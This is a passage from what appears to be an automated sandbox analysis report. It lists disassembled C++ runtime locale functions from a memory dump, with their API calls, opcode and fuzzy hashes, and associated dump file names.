Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ba9972da143e5ef666f1bddf533a64ff0641485118160ef8351f58b606f41a0d
Instruction ID: 9e53a6ed093efa1b66756578fe8ed2ae19d44a5a773408e169395049c2aa53c3
Opcode Fuzzy Hash: ba9972da143e5ef666f1bddf533a64ff0641485118160ef8351f58b606f41a0d
Instruction Fuzzy Hash: A501683B25CB015EA68446F89C886E63F6BEB12779730032EF310950D0EF654AC1B150

Uniqueness

Uniqueness Score: -1.00%

Function 6E198E37, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198E3E
std::_Lockit::_Lockit.LIBCPMT ref: 6E198E48

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

ctype.LIBCPMT ref: 6E198E82
std::_Facet_Register.LIBCPMT ref: 6E198E99
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198EB9
Concurrency::cancel_current_task.LIBCPMT ref: 6E198EC6

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
String ID:
API String ID: 130866940-0
Opcode ID: 5058d2979e4de2d214d29e5045a79bd959132a891d0ce8ab62bf86f801d6a6b8
Instruction ID: 39386851b63e0e6d124aae01dcb901c93bfb69ba2ab5e600cca973946e8a786b
Opcode Fuzzy Hash: 5058d2979e4de2d214d29e5045a79bd959132a891d0ce8ab62bf86f801d6a6b8
Instruction Fuzzy Hash: 1701C439D00619DFCB05DBE4C8206FEB779AF84314F244809E811AB290CF349AC9FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198ECC, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198ED3
std::_Lockit::_Lockit.LIBCPMT ref: 6E198EDD

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

messages.LIBCPMT ref: 6E198F17
std::_Facet_Register.LIBCPMT ref: 6E198F2E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198F4E
Concurrency::cancel_current_task.LIBCPMT ref: 6E198F5B

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4019330243-0
Opcode ID: 6de3f493ff526fc793d4f53e1858f55a13c43a3aa6edb9841c1ea752d7fd7ed0
Instruction ID: 5e076aeb189553285414570725fcfbe19b921862a8ee4b366de0af7591399d3a
Opcode Fuzzy Hash: 6de3f493ff526fc793d4f53e1858f55a13c43a3aa6edb9841c1ea752d7fd7ed0
Instruction Fuzzy Hash: AC01C4359005199BCF05DBE4C814AFE77BABF84354F244809E825AB280CF749AC9FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E198F61, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198F68
std::_Lockit::_Lockit.LIBCPMT ref: 6E198F72

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

messages.LIBCPMT ref: 6E198FAC
std::_Facet_Register.LIBCPMT ref: 6E198FC3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198FE3
Concurrency::cancel_current_task.LIBCPMT ref: 6E198FF0

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4019330243-0
Opcode ID: 6d96786f81671898f0fcfee713f0c8460df2bef22502acfaa80794c16d21dfbf
Instruction ID: 7df3ae128c0745ee1e005bdc67847355afb9dde7f10253f6837f3f8b7440b8fe
Opcode Fuzzy Hash: 6d96786f81671898f0fcfee713f0c8460df2bef22502acfaa80794c16d21dfbf
Instruction Fuzzy Hash: 2A01C4359005169FCB05DBE4C814AFE777A7F94754F240809E811AB2C0DF3099C8BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E198C78, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198C7F
std::_Lockit::_Lockit.LIBCPMT ref: 6E198C89

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

codecvt.LIBCPMT ref: 6E198CC3
std::_Facet_Register.LIBCPMT ref: 6E198CDA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198CFA
Concurrency::cancel_current_task.LIBCPMT ref: 6E198D07

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 614290800-0
Opcode ID: 74aba47e3ea7362393986cacc40b0576e7c3834b6ab09e8cd0c3d851c3140ebc
Instruction ID: 394e12805d4733e4918c964a3baea71fa44e8d2b4192e725d344a79ec5cb6fa7
Opcode Fuzzy Hash: 74aba47e3ea7362393986cacc40b0576e7c3834b6ab09e8cd0c3d851c3140ebc
Instruction Fuzzy Hash: 1001D63590051ADFCF05DBE4D814AFD7779AF84314F244809E821AB280CF7099C5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198D0D, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198D14
std::_Lockit::_Lockit.LIBCPMT ref: 6E198D1E

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

collate.LIBCPMT ref: 6E198D58
std::_Facet_Register.LIBCPMT ref: 6E198D6F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198D8F
Concurrency::cancel_current_task.LIBCPMT ref: 6E198D9C

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
String ID:
API String ID: 854050597-0
Opcode ID: 5f7fedb943f4c0cad98c315f9fd8dae7e7a3d405553f5db52f0b8d0345870dcb
Instruction ID: fc9f8dec7159ce59476065ed2a94e9b6416dca88f47aba3c0eb6a2ac7f9ac253
Opcode Fuzzy Hash: 5f7fedb943f4c0cad98c315f9fd8dae7e7a3d405553f5db52f0b8d0345870dcb
Instruction Fuzzy Hash: 0701D635900219DFCF05DBE4C8546FE77B9AF94714F244809E815AB290CF309AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198DA2, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198DA9
std::_Lockit::_Lockit.LIBCPMT ref: 6E198DB3

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

collate.LIBCPMT ref: 6E198DED
std::_Facet_Register.LIBCPMT ref: 6E198E04
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198E24
Concurrency::cancel_current_task.LIBCPMT ref: 6E198E31

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
String ID:
API String ID: 854050597-0
Opcode ID: fd563bb426b6e96af3f2d2032ec5ffccf0a72d2c7ebae35b758a3ced18c38b85
Instruction ID: b9c5f9ff80df82dcf86efd7d197706c31ee95018ebd097e7722d357b9bc2875e
Opcode Fuzzy Hash: fd563bb426b6e96af3f2d2032ec5ffccf0a72d2c7ebae35b758a3ced18c38b85
Instruction Fuzzy Hash: 1901C4359001198FCF05DBE4C864AFEB77AAF84314F244909E811AB280CF309EC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5C89, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5C90
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5C9A

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E1A5CD4
std::_Facet_Register.LIBCPMT ref: 6E1A5CEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5D0B
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5D18

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 1ec32f4641490b53c5ff8523f04be55eacc98af68c178b79e1d51544e5577390
Instruction ID: 943a61ba7dc438d287af88a0061a145d8f19d911c79bc52c60fe55c4d2a9d107
Opcode Fuzzy Hash: 1ec32f4641490b53c5ff8523f04be55eacc98af68c178b79e1d51544e5577390
Instruction Fuzzy Hash: 9A01D6399006199FCF05DBE8C814AFD77B9AF84314F244809E921BB280CF3099C4EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5A35, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5A3C
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5A46

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

messages.LIBCPMT ref: 6E1A5A80
std::_Facet_Register.LIBCPMT ref: 6E1A5A97
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5AB7
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5AC4

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4019330243-0
Opcode ID: ba88f73cf0ea72cf37cdf5474ba90826a41fc87de29dd1000fd9ba4cb9674ae8
Instruction ID: 3d9988620228243624e55f100f26299a3667a51914be62b074eaf32b7dc1640a
Opcode Fuzzy Hash: ba88f73cf0ea72cf37cdf5474ba90826a41fc87de29dd1000fd9ba4cb9674ae8
Instruction Fuzzy Hash: FA01C439A00519DFCF05DBE8C8506FE777AAF84314F254809E911AB280CF309DC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5BF4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5BFB
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5C05

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E1A5C3F
std::_Facet_Register.LIBCPMT ref: 6E1A5C56
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5C76
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5C83

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 92169b04181ed09b5b8de6d8a6ac392827505e02bf7a5a62503076739adc03d4
Instruction ID: 82fc6aaa63711f39969082ff4d791366afad50befdd7dc3878c9ab6c5f535116
Opcode Fuzzy Hash: 92169b04181ed09b5b8de6d8a6ac392827505e02bf7a5a62503076739adc03d4
Instruction Fuzzy Hash: A601C4399046199FCF05DBE8D9146FD777DAF84714F644809E911AB2C4CF309AC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19361B, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E193622
std::_Lockit::_Lockit.LIBCPMT ref: 6E19362C

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

numpunct.LIBCPMT ref: 6E193666
std::_Facet_Register.LIBCPMT ref: 6E19367D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19369D
Concurrency::cancel_current_task.LIBCPMT ref: 6E1936AA

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1613453239-0
Opcode ID: 81e031490ba8dee918a3d062e9805d500295193485a825c337b78dc5f440ec39
Instruction ID: 0028519176401f016a80325fdffecf9521edcbbbd80284b082ae5a5b868edfb4
Opcode Fuzzy Hash: 81e031490ba8dee918a3d062e9805d500295193485a825c337b78dc5f440ec39
Instruction Fuzzy Hash: CC01C435900516CFCB05DBE4C918AED77BABF84314F244819E829AB380CF309AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19965D, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199664
std::_Lockit::_Lockit.LIBCPMT ref: 6E19966E

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

numpunct.LIBCPMT ref: 6E1996A8
std::_Facet_Register.LIBCPMT ref: 6E1996BF
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1996DF
Concurrency::cancel_current_task.LIBCPMT ref: 6E1996EC

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
String ID:
API String ID: 1613453239-0
Opcode ID: 2d68e501d6159114880b1aab310b07ffb7af8af61c54d284db74fb5996fab123
Instruction ID: 245922cce948cd74e94cef248f2f37043561a4d65e63d741d66994c31787f0b7
Opcode Fuzzy Hash: 2d68e501d6159114880b1aab310b07ffb7af8af61c54d284db74fb5996fab123
Instruction Fuzzy Hash: 6E01D6759001198FCF05DBE4C864AFE77B9AF84314F240809E821AB290CF359AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199409, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199410
std::_Lockit::_Lockit.LIBCPMT ref: 6E19941A

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E199454
std::_Facet_Register.LIBCPMT ref: 6E19946B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19948B
Concurrency::cancel_current_task.LIBCPMT ref: 6E199498

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 1d158d41a6790bf1fc1596d1cf1ad170c6903e4903fd7e20ad12b73d22eacb59
Instruction ID: 7642f4a12d3c785234d10d811e9be50fb0a5542de51db2306e885ad6f1c017d7
Opcode Fuzzy Hash: 1d158d41a6790bf1fc1596d1cf1ad170c6903e4903fd7e20ad12b73d22eacb59
Instruction Fuzzy Hash: 3C01D67590011ACFCB06DBE4C924AFD777A6F94314F244909E821AB380CF309AC4FB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E19924A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199251
std::_Lockit::_Lockit.LIBCPMT ref: 6E19925B

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E199295
std::_Facet_Register.LIBCPMT ref: 6E1992AC
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1992CC
Concurrency::cancel_current_task.LIBCPMT ref: 6E1992D9

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 74bc4b038c1c5ae1261b67a037225e2999d05330a7ec4a7f660dc308ba1fd581
Instruction ID: 362467e3f6c30ec5c52ba7210d1a02f663c517a444eae956154af8f8e17132a0
Opcode Fuzzy Hash: 74bc4b038c1c5ae1261b67a037225e2999d05330a7ec4a7f660dc308ba1fd581
Instruction Fuzzy Hash: 0B01C4799005199FCB05DBE4C8246FD7779AF84314F240809E811AB280DF309AC8BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1992DF, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1992E6
std::_Lockit::_Lockit.LIBCPMT ref: 6E1992F0

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E19932A
std::_Facet_Register.LIBCPMT ref: 6E199341
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199361
Concurrency::cancel_current_task.LIBCPMT ref: 6E19936E

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: 6c3608e2ec77338507a0f8c2201b0592bd4a3d29abd5ff76c5aa4df6c83a0592
Instruction ID: d788cbee4a1e63204e9d811192541543f6225f3b3f0145b497824c6980705d36
Opcode Fuzzy Hash: 6c3608e2ec77338507a0f8c2201b0592bd4a3d29abd5ff76c5aa4df6c83a0592
Instruction Fuzzy Hash: E301C4359001199FCF05DBE8C8246FE77B9AF94714F244809E815AB2C0CF719AC9FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199374, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19937B
std::_Lockit::_Lockit.LIBCPMT ref: 6E199385

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

moneypunct.LIBCPMT ref: 6E1993BF
std::_Facet_Register.LIBCPMT ref: 6E1993D6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1993F6
Concurrency::cancel_current_task.LIBCPMT ref: 6E199403

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 2743796646-0
Opcode ID: e9fe979866d34cc28546dd583a4ac564ffe356afa36d492bce134b9c5b4beaf5
Instruction ID: 9d285fafeaac1ba0abaa64e43ddfcc3a5e286b63f1931e2a9ed5d2d762bcf19d
